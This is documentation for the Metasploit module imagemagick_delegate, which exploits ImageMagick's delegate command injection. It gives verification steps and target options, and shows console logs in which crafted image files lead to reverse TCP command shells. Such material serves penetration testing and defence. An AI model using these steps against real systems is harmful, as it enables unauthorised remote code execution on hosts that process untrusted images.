55 lines
1.5 KiB
Markdown
55 lines
1.5 KiB
Markdown
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
ImageMagick
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
Example steps in this format:
|
||
|
|
|
||
|
|
1. Install the ImageMagick
|
||
|
|
2. Start msfconsole
|
||
|
|
3. Do: ```use exploits/unix/fileformat/imagemagick_delegate```
|
||
|
|
4. Do: ```run```
|
||
|
|
5. convert msf.png msf.jpg
|
||
|
|
|
||
|
|
## Options
|
||
|
|
|
||
|
|
**USE_POPEN**
|
||
|
|
|
||
|
|
When the default option `true` is used, targets 0 (SVG file) and 1 (MVG file) are valid
|
||
|
|
When the option is set to `false`, target 2 (PS file) is valid
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
|
||
|
|
## popen=true
|
||
|
|
```
|
||
|
|
msf exploit(imagemagick_delegate) > set target 0
|
||
|
|
msf exploit(imagemagick_delegate) > run
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||
|
|
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
|
||
|
|
[*] Command shell session 1 opened (1.1.1.11:4444 -> 1.1.1.1:57212) at 2016-10-28 12:47:06 -0500
|
||
|
|
```
|
||
|
|
|
||
|
|
```
|
||
|
|
msf exploit(imagemagick_delegate) > set target 1
|
||
|
|
msf exploit(imagemagick_delegate) > run
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 10.6.0.186:4444
|
||
|
|
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
|
||
|
|
[*] Command shell session 2 opened (1.1.1.1:4444 -> 1.1.1.1:64308) at 2016-10-28 15:48:40 -0500
|
||
|
|
```
|
||
|
|
|
||
|
|
## popen=false
|
||
|
|
```
|
||
|
|
msf exploit(imagemagick_delegate) > set target 2
|
||
|
|
target => 2
|
||
|
|
msf exploit(imagemagick_delegate) > set USE_POPEN false
|
||
|
|
USE_POPEN => false
|
||
|
|
msf exploit(imagemagick_delegate) > run
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||
|
|
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
|
||
|
|
[*] Command shell session 5 opened (1.1.1.1:4444 -> 1.1.1.1:64772) at 2016-10-28 15:58:03 -0500
|
||
|
|
```
|